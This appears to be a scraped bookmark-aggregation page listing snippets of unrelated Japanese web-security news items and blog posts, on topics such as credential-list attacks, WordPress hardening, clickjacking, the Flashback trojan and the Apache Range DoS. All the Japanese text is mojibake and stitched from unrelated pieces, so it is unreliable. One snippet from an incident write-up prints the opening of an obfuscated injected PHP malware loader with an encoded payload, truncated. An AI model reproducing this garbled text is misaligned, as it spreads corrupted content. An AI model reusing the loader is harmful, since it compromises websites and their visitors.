eBook Japanã«å¯¾ããä¸æ£ã¢ã¯ã»ã¹ã«ã¤ãã¦ã詳細ã®çºè¡¨ããããããããããã¹ã¯ã¼ããªã¹ãæ»æãã§ãããã¨ãçºè¡¨ããã¾ããã ååã®ãå ±åã¾ã§ã¯ãè¤æ°ã®IPã¢ãã¬ã¹ãããã°ã¤ã³ãã¼ã¸ã«å¯¾ãã¦æ©æ¢°çã«ç·å½ããæ»æçãè¡ã大éã¢ã¯ã»ã¹è¡çºï¼ãã«ã¼ããã©ã¼ã¹ã¢ã¿ãã¯ï¼ãã¨ã説æãã¦ããã¾ãããã詳細調æ»ã®çµæããä¸æ£ã®çãããè¤æ°ã®IPã¢ãã¬ã¹ãããã°ã¤ã³ãã¼ã¸ã«å¯¾ãã¦ãäºãæã£ã¦ãããã°ã¤ã³IDã¨ãã¹ã¯ã¼ãã®é©ç¨å¯å¦ã試è¡ãã大éã¢ã¯ã»ã¹è¡çºãã§ãããã¨ãå¤æãããã¾ããã ã¤ã¾ãã大éã¢ã¯ã»ã¹è¡çºãä»æãã¦ããè ã¯ãå½ç¤¾ä»¥å¤ã®ä»ã®ãµã¼ãã¹ãªã©ã§ä»ã®ãµã¼ãã¹ã®ãã°ã¤ã³IDã¨ãã¹ã¯ã¼ããä¸æ£ã«å ¥æããã¦ã¼ã¶ã¼ããã°ã¤ã³IDã¨ãã¹ã¯ã¼ããå ±éã«è¨å®ãã¦ããå¯è½æ§ãçã£ã¦å½ç¤¾ãµã¼ãã¹ã«ä¸æ£ã«ãã°ã¤ã³ãããã¨ããä¸è¨ä»¶æ°ã«ã¤ãã¦ã¯ãã°ã¤ã³ã«æåãã¦ãã¾ã£ãã¨ãããã¨ã§ãã ãã®ããã«å¤æããæ ¹æ
ã©ããããã«ã¼ã§ããç§ã§ããã å£ç¯ãããããã¨ã«ãWordPressãã¯ã©ãã¯ãããã®ã§ãã»ãã¥ãªãã£å¯¾çã«ã¤ãã¦èª¿ã¹ã¦ã¿ã¾ãããçãªããã°è¨äºãã½ã¼ã·ã£ã«ä¸ã§åºã¾ããããã®ãã³ã«WordPressãæ±ããããããã¼å±¤ããã¾ãç¡æå³ãªå¯¾çãã¯ã¦ãããã¦ãâ¦ãã¨åãã®ãæä¾è¡äºã®ããã«ãªã£ã¦ããã¾ããä¾ãã°â¦ ãWordPressã®ãã¼ã¸ã§ã³ãé ãã ããã¼ã¿ãã¼ã¹ã®ãã¬ãã£ã¯ã¹ãå¤æ´ããã ããµããã£ã¬ã¯ããªã¼ã«ã¤ã³ã¹ãã¼ã«ããã ãããæ°ä¼ãç¨åº¦ããªâ¦ ã2年以ä¸æ¾ç½®ããã¦ããæªãããªã»ãã¥ãªãã£å¯¾çãã©ã°ã¤ã³ãå ¥ããã ãã£ã¡ã®ã»ããããããï¼ ããµã¼ãã¼ã®ãã£ã¬ã¯ããªã¼ä¸è¦§ã®é表示ã ããè¦ãã¡ãã£ã¦ããµã¼ãã¼ç®¡çè ã§ã¯ãä½ãã¦ãä¸å®ã ãï¼ ã¨ã¯ãããããæãã¤ã¤ããããã決å®çã ï¼ãçãªè¨äºãæ¸ãã®ã¯åæ°ããããã®ã§ããç¹ã«ã»ãã¥ãªãã£æ¥çã¯æããå ãããå¤â¦ããä½ãããããr
Twitterã®æ稿ãããæ稿è ã®èªå® ä½æãå²ãåºãã¨ããæããããªãµã¤ããä»æã¹ã¿ã¼ãããããã®åããWeKnowYourHouse.comãï¼ãåã®å®¶ãç¥ã£ã¦ããï¼ã ã ãã®ãµã¤ãã¯ãã家ã«å¸°ã£ããã®ãããªå®¶ããã¨æããããã¤ã¼ããæ¢ãï¼è±èªã®ã¤ã¶ããã対象ã®ããã ï¼ããã®ä½ç½®æ å ±ã使ã£ã¦ãã¤ã¶ããã人ã®ä½æãå²ãåºãã¦ããµã¤ãä¸ã«è¡¨ç¤ºãã¦ããããµã¤ãã«ã¯ãââï¼ã¢ã«ã¦ã³ãåï¼ã¯ÃÃã®è¿ãã«ä½ãã§ãããã¨è¡¨ç¤ºãããï¼ä¸é¨ã¯ä¼ãåã«ãªã£ã¦ããï¼ãããªã詳細ãªå ´æãç¹å®ããã¦ããã®ã¯è¦ã¦ãã¦æããªãã WeKnowYourHouse.com åãµã¤ãã¯ãSNSã®ãã©ã¤ãã·ã¼ã«é¢ããå®é¨ã¨ãã¦ä½ããããµã¤ãä¸ã«ã¯éå»1æéåã®ãã¼ã¿ã®ã¿ã表示ãããã¼ã¿ã¯ä¿åããç ´æ£ãã¦ããã¨ãããä½æã表示ãã¦ã»ãããªã人ã«ã¯è¡¨ç¤ºæå¦ã®æ段ãç¨æãã¦ãããä½ç½®æ å ±ãä»ããã«ã¤ã¶ããã¦ããã°ãWeKnowYo
æ¯å¹´æä¾ã®è¨ºæåæºåã¨ãã¦éçºè åãã«ããåå¿è Webã¢ããªã±ã¼ã·ã§ã³éçºè ããã§ãã¯ãã¹ãæ å ±æºããéãã¦ããã®ã§ãçããã«ããç´¹ä»ãä»ã«è¿½å ããæ¹ãè¯ãæ å ±æºããã£ãå ´åã¯ãææããã ããã¨å©ããã¾ãã ä¸ããéè¦ãªé ãâ ãã¨ããããèªãã©ããã®å¿ é ãå¿ é ã®ãã¤ã³ãã¯ãçæéã§å¤§éæã«ç¶²ç¾ çã«ãã¤ã³ããæ´çããã¦ãããã®ã 徳丸æ¬ã¯ä»å¹´ã¯å¿ é ããªãé»åæ¸ç±çããããããã¹ããã«å¸¸åã§ãããã ãã¨ãå¾åãã¾ã£ããåå¿è åããããªããã©ãã»ãã¥ãªãã£ãã£ã³ãçåãã«Webãã¹ãã§ããããã®ãã¼ã«é¡ãç´¹ä»ãWebã»ãã¥ãªãã£çµã®åèã«ããã¨ããããã¯ã¼ã¯ã»ãã¥ãªãã£çµãFiddler2ã使ãã®ã¯ãã±ããã®ä¸èº«ã®å¯è¦åã«è¯ãã¨æãã®ã§ãã¤ã³ã¹ãã¼ã«ãã¦è¦ãããã®ããããããã¨ãããã¯ãã¼ã«æ å ±ãå®æçã«ãã¹ããããã¨æãã®ã§ããã£ã³ãçã¯ãã§ãã¯ãã¦ããã¦æ¬²ããã â Webãµã¤ãæ§ç¯ å®å ¨ãª
ã³ã¼ãã¼ãµã¼ãã¯é¦çã§ãã ç¾äººããã°ã©ãããã ã¾ãã½ã®ããã°ã§ãããã¼ã¿ãå¹ã£é£ãã§ãã¾ã£ã¦ä»®å¾©æ§ä¸ãç»åãå ¥ã£ã¦ããªãã¨ãããæ´å½¢ããã¦ããªãã¨ãããªã©ãããã¾ãã æ¤ç´¢ ã¡ã¤ã³ã¡ãã¥ã¼ æè¿ãç¥ããªããã¡ã«ã¢ãã«ããµã¤ããªã©ãFacebookã§ããããããã¦ãã¾ãã¨ããåé¡ã話é¡ã«ãªã£ã¦ããã ç¥ããªãéã«ã¢ãã«ããµã¤ããããããã Facebookç¥äººãååã«æ§çå好ããã¬ã (J-CASTãã¥ã¼ã¹) ããã«ã¯ã¯ãªãã¯ã¸ã£ããã³ã°ã¨å¼ã°ããææ³ã使ããã¦ããããã¨ãã°ãã¦ã¼ã¶ãèå³ãå¼ããããªç»åã表示ãã¦ã¯ãªãã¯ãä¿ããå®éã«ã¯ãã®ä¸ã«ãã¶ããããã«è¨ç½®ãããéæã®ããããããã¿ã³ããæ¼ãããã¨ãããããªä»çµã¿ã ããã¼ã¸å ã®è¦ç´ ã®ãéæ度ããå¤ãããã¨ã§ããã¨ç°¡åã«ä»æããããã ãããããªçµµã§ããããã¦ã¿ããå³ä¸ã®ããããã¿ã³ã¯åéæã«ãªã£ã¦ããããã©ãå®éã«ä»æããå ´åã¯éæ
2012/04/10 Webã¢ããªã±ã¼ã·ã§ã³ã®ã»ãã¥ãªãã£æ¹åã«åããåçºãç 究活åãè¡ãéå¶å©å£ä½ãThe Open Web Application Security Projectï¼OWASPï¼ã®æ¥æ¬æ¯é¨ã§ããOWASP JAPANãã£ãã¿ã¼ã¯3æ27æ¥ã第1åã®Local Chapter Meetingãéå¬ãããä»å¾ãããããã»ããã¼ãå®æçã«éå¬ãã¦ããæ¹éã ã OWASPã¯ãWebã¢ããªã±ã¼ã·ã§ã³ã»ãã¥ãªãã£ã®åä¸ãç®çã¨ããå£ä½ã ãWebã¢ããªã±ã¼ã·ã§ã³ã®èå¼±æ§ã¯ã¼ã¹ã10ãåãã¾ã¨ããææ¸ãOWASP Top 10ããå®æçã«å ¬éããã»ããå®å ¨ãªã¢ããªã±ã¼ã·ã§ã³éçºã®ããã®ã¬ã¤ãã©ã¤ã³ãèå¼±æ§è¨ºæãã¥ã¼ããªã¢ã«ã診æãã¬ã¼ãã³ã°ç¨ã®âãããWebã¢ããªã±ã¼ã·ã§ã³âã§ãããWebGoatããªã©ããã¾ãã¾ãªãªã½ã¼ã¹ãæä¾ãã¦ããã JAPANãã£ãã¿ã¼ãªã¼ãã¼ã®1人ãBenny
ï¼Macï¼Flashbackã¯ãããï¼ 2012å¹´03æ23æ¥21:52 ãã¤ã¼ã fsecure_corporation ã¯ã¢ã©ã«ã³ãã¼ã«çºÂ byï¼ã¹ã¬ããã½ãªã¥ã¼ã·ã§ã³ãã¼ã ææãFlashbackããã¤ã®æ¨é¦¬ã«ãã£ã¦Macã«é害ãèµ·ããªãæ¹æ³ããç´¹ä»ãããä»æ¥ã¯Flashbackææãè¦ã¤ããæ¹æ³ã«é¢ããæ å ±ãæä¾ããã 以ä¸ã®ã¹ããããããè¯ãç解ããã«ã¯ãFlashbackã«ã¤ãã¦ãå¤å°ãã¦ããæ¹ãè¯ãã ãããããã¯OS Xãã«ã¦ã§ã¢ãã¡ããªã§ãWebãã©ã¦ã¶ã«ãã表示ãããã³ã³ãã³ããä¿®æ£ããããã®ããã«ãåãã«ã¦ã§ã¢ã¯Macã®ãã©ã¦ã¶ã使ç¨ããæ©è½ãå©ç¨ãããä¹ã£åãããæ©è½ã¯äºç¨®ãã¨ã«ç°ãªãããä¸è¬ã«CFReadStreamReadããã³CFWriteStreamWriteãå«ã¾ããï¼ æ¨çã¨ãããWebãã¼ã¸ã¨å¤æ´ã¯ããªã¢ã¼ããµã¼ãããèªã¿åºãããã³ã³ãã£ã®ã¥ã¬ã¼ã·ã§
HTML5 Security Cheatsheetã¯HTML5ã®ã»ãã¥ãªãã£ã«é¢ãããã¼ãã·ã¼ãã§ããåé¡ç¹ã¨å¯¾è±¡Webãã©ã¦ã¶ã対å¦æ³ãä¸è¦§ã«ãªã£ã¦ãã¾ãã HTML5 Security Cheatsheetã¯HTML5ã«ãããã»ãã¥ãªãã£ãã¼ã«ã«ãªãããåé¡ç¹ãã³ã¼ããéãã¦åºãã¦ãããã¨ããããã¸ã§ã¯ãã§ããWebããã°ã©ãå¿ è¦ã¨è¨ããã§ãããã ããããã¼ã¸ã§ããæ§ã ãªé ç®ã並ãã§ãã¾ãã å·¦å´ã¯åã»ãã¥ãªãã£ãã§ãã¯ãã¹ãé ç®ã§ã対象ã«ãªãWebãã©ã¦ã¶ã¨ãã®ãã¼ã¸ã§ã³ã並ãã§ãã¾ããåé¡ç¹ã®æ示ã¨ã¨ãã«ããã®åé¿çã«ã¤ãã¦ãæ¸ããã¦ãã¾ãã®ã§ã¨ã¦ãåèã«ãªãã¾ãã ã¾ã æ¥æ¬èªåããã¦ããªãé¨åãããã¾ãã ã»ã¼å ¨ã¦ã®Webãã©ã¦ã¶ã対象ã«ãªãé¨åãããããã§ãã é ç®ã¯é常ã«å¤ãã§ãããã»ãã¥ãªãã£ãéè¦ããããã«ããã§ãã¯ãã¦ããã¹ãã§ãã HTML5ã§ã¯ããã¾ããIE6ãªã©
ããã«ã¡ã¯ããã«ã¡ã¯ï¼ï¼ Webããã°ã©ãã³ã°ãã¦ã¾ããï¼ ãããPHPã¯ã»ãã¥ãªãã£ããã¡ãã¨ãè¨ããã¦ãããã ã§ãããã£ã¦ãã¹ã¤ã«PHPãæªãããããªãã¦ã ãã¶ããã»ãã¥ãªãã£ã¨ãããã¾ã ããããããªã人ãå¤ãã ããªããããªãããªã ããã°ã£ã¦åå¼·ãããã¨æã£ã¦ãããªãã ãé£ããçå±ã並ãã§ãããããããâ¦ã ãªã®ã§ä»æ¥ã¯ãã»ãã¥ãªãã£å¯¾çã«ã¤ãã¦ã ãããã ããã£ã¨ãã°ãããã¨å®å ¨ã«ãªãããã£ã¦ãã¨ããåå¿è ããã«ã大éæã«æ¸ãã¦ã¿ã¾ãï¼ çå±ãããããªãã¦ããæåã¯ã³ããã§ãã ãªã«ããããªãããããã£ãã»ãããã£ã¨ãã·ã«ãªãï¼ 1. XSS対ç åçãªãã®ã表示ããã¨ããå ¨é¨ã¨ã¹ã±ã¼ãããã°okã§ãï¼ (NG) ããªãã®åå㯠<?= $name ?> ã§ããï¼ â (OK) ããªãã®åå㯠<?= htmlspecialchars($name, ENT_QUOTES) ?>
æ¹ããããã¦ã¦ã£ã«ã¹é å¸ã³ã¼ãåããã¾ãã¦ãã復æ§ã¾ã§ã®ä½æ¥ãç³è«ã®æç¶ãã«ã¤ãã¦ã¾ã¨ãã¦ããã¾ãã 追è¨: ãæ¹ãããããå ´åãã®ãã®ã®å¯¾å¦æ¹æ³ãã¨ããæå³ã§æ¸ããã¦é ãã¾ãããphpMyAdmin ã®èå¼±æ§ã«ã¤ãã¦ã§ã¯ãªãå ¨è¬çãªå 容ã¨ãªã£ã¦ããã¾ãã誤解ãä¸ãã表ç¾ã¨ãªã£ã¦ãã¾ãç³ã訳御座ãã¾ããã ä»ååããã¾ããä¸æ£ãªã³ã¼ã å®éã®ã³ã¼ãã¯æ¹è¡ãã¹ãã¼ã¹ããªããªã£ã¦ä¸è¡ã®ã³ã¼ãã¨ãªã£ã¦ããã¾ãã®ã§é常ã«æ°ã¥ãã«ããã§ãã <?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) { $eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs90cuZlTz5mROtHWHdWfRt0ZupmVRNTU2Y2MVZkT8h1Rn1XULdmbqxGU7h1Rn
ç¡å¹ãªURLã§ãã ããã°ã©ã è¨å®ã®åæ å¾ ã¡ã§ããå¯è½æ§ãããã¾ãã ãã°ããæéãããã¦å度ã¢ã¯ã»ã¹ãã試ããã ããã
æåã«æã£ã¦ããã¾ãããFFFTPèªä½ã¯è¯ãã¢ããªã±ã¼ã·ã§ã³ã½ããã¦ã§ã¢ã ã£ãã¨æãã¾ããUIãWindowsã®ã¨ã¯ã¹ããã¼ã©ã«å£ã£ã¦ããã¨åæã«ã¨ã¯ã¹ããã¼ã©ã¨ã¯ã²ã¨ç®ã§è¦åããã¤ããã¶ã¤ã³ã ã£ãã®ã§ã使ããããã£ãã¯ãã§ãã ã¼ããã¤ã³ã¿ã¼ããããã¯ãããããæåã®é ã«ä½¿ã£ã¦ãã¾ãããã»ã©ãªããã¦Windowsèªä½ã使ããªããªã£ãã®ã§ããã以æ¥è§¦ããã¨ã¯ãªããªã£ããããªã®ã§ããã FFFTPã¯ä½æ éçºçµäºããã®ãéçºè ã¯ãéçºãç¶ç¶ããããã®ã¢ããã¼ã·ã§ã³ãç¶æã§ããªããªã£ããã¨è¿°ã¹ã¦ããããã§ãããã¾ãå½ããåã ã¨æãã¾ãã FFFTPãåä½ããWindowsã¨FFFTPãæ±ããããã³ã«ã§ããFTPèªä½ããªã¯ã³ã³ã ããã§ããåè ã«ã¤ãã¦ã¯å¹¾ã°ããã®åè«ã®ä½å°ãããã§ãããããå¾è ã«ã¤ãã¦ã¯ç°è«ã¯èªãã¾ããã ãçµãã£ãããããã³ã«ã®ããã®ã½ããã¦ã§ã¢ãä½ãç¶ããã¨ããã®ã¯ãããã°ã©ã
Apache Web Serverã«æªè§£æ±ºã®èå¼±æ§ãåå¨ãããã®èå¼±æ§ãçªããæ»æã横è¡ãã¦ããã¨ãã¦ãApache Software Foundationã8æ24æ¥ä»ï¼ç±³å½æéï¼ã®ã¢ããã¤ã¶ãªã¼ã§æ³¨æãä¿ããã ã¢ããã¤ã¶ãªã¼ã«ããã¨ãApacheã§Rangeãªã¯ã¨ã¹ããå¦çããæ¹æ³ã«ãµã¼ãã¹å¦¨å®³ï¼DoSï¼ã®èå¼±æ§ãåå¨ãããå½±é¿ãåããã®ã¯Apache 1.3ã¨Apache 2ã®å ¨ãã¼ã¸ã§ã³ãèå¼±æ§ãçªãã¦ãªã¢ã¼ãããæ»æãåããã¨ã大éã®ã¡ã¢ãªã¨CPUãæ¶è²»ããã¦ãã¾ãæããããã èå¼±æ§æ å ±ã¯å ã«ã»ãã¥ãªãã£ã¡ã¼ãªã³ã°ãªã¹ãã§ãå ¬éãããæ»æãã¼ã«ãåºåã£ã¦åºã使ããã¦ããã¨ããããã®åé¡ãä¿®æ£ãããããã¯4æ¥ä»¥å ã«å ¬éãããè¦éããã¢ããã¤ã¶ãªã¼ã§ã¯å½é¢ã®å¯¾çã¨ãã¦ãæ»æãé¿ããããã®è¨å®æ¹æ³ãç´¹ä»ãã¦ããã
æ¬å使ç¨ã«é¢ããã³ãã¥ããã£ã¼ã®æ¨æºè¦ç´ã§è¦å´ãã¦ãããGoogle+ãã«ããã¦ããã®24æéã§ããªãã®æ°ã®ã¢ã«ã¦ã³ããåé¤ãããã¦ã¼ã¶ã¼ã«çå¤æã¨ææãä¸ãã¦ããã Limor Friedæ°ï¼å¥åAdafruit Industriesã®Ladyadaï¼ã®ã¢ã«ã¦ã³ãã¯ä¸åº¦åé¤ãããããå½±é¿åã大ãããã¨ãã復å ããããFriedæ°ã¯å é ãWIRED Magazineã®è¡¨ç´ã«åãä¸ãããã¦ããã Googleã¯Limor Friedæ°ã®Google+ãããã£ã¼ã«ãLadyadaããä¸æåæ¢ããããä¸æºã®å£°ã殺å°ããå¾ãä¸æè°ãªãã¨ã«åæ°ã®ã¢ã«ã¦ã³ãã¯å¾©å ããããåé¤ãããã»ãã®ã¢ã«ã¦ã³ãã¯Friedæ°ã®ãããªæå©ãªç«å ´ã«ã¯ãªããã¨è¨ãã«ã¨ã©ãã¦ãããã å¤ãã®ã¢ã«ã¦ã³ããåé¤ãããè¨äºå·çæç¹ã§ããç±³å½æé7æ23æ¥ã¢ã«ã¦ã³ãã®å¾©å ã«ã¯è³ã£ã¦ããªãã çè ã¯23æ¥ååãéå»ã®Google+é¢
ãµã¤ãä¸ã®åç»çªãã¯ãªãã¯ãããã¢ãã«ããµã¤ããããããï¼ããã¦ãã¾ã£ãââä¸è¬ã®ãµã¤ãã«è¦ãããã¦Facebookã®ãããï¼ãæ¼ãããã¯ãªãã¯ã¸ã£ããã³ã°ãè¦ã¤ãã£ã¦ããã注æãå¿ è¦ã ã åç»å ±æãµã¤ãã®ãããªãã¶ã¤ã³ã®ããWebãµã¤ãããçæ¾éä¸ã«èµ·ãããããã³ã°ï¼ãã¨ããã¿ã¤ãã«ã®åç»çªã®åçãã¿ã³ãæ¼ãã¨ãåç»ã¯åçããããã¢ãã«ããµã¤ãããããï¼ãã¦ãã¾ãããããããµã¤ããè¤æ°è¦ã¤ãã£ã¦ããã ãããï¼ãã¦ãã¾ã以å¤ã®å®å®³ã¯ãªãããã ããåç»çªã«éãããæªãããªãµã¤ãã¸ã®ã¢ã¯ã»ã¹ã¨ãµã¤ãä¸ã§ã®ã¯ãªãã¯ã«ã¯æ大éã®æ³¨æãå¿ è¦ããããï¼ã¯Facebookããããã¼ã¸å·¦ä¸ã®èªåã®ã¢ã¤ã³ã³ããã¢ã¯ã»ã¹ããèªåã®ã¦ã©ã¼ã«ããããããï¼ãããªã³ã¯ãã¨åé¤ãããã¨ãã§ããã é¢é£è¨äº Facebookã§ã¯ãªãã¯ããã¨åºããã¯ã¼ã çã¹ãã ã«æ³¨æ ãIn order to PREVENT SPAM
ãªãªã¼ã¹ãé害æ å ±ãªã©ã®ãµã¼ãã¹ã®ãç¥ãã
ææ°ã®äººæ°ã¨ã³ããªã¼ã®é ä¿¡
å¦çãå®è¡ä¸ã§ã
j次ã®ããã¯ãã¼ã¯
kåã®ããã¯ãã¼ã¯
lãã¨ã§èªã
eã³ã¡ã³ãä¸è¦§ãéã
oãã¼ã¸ãéã
{{#tags}}- {{label}}
{{/tags}}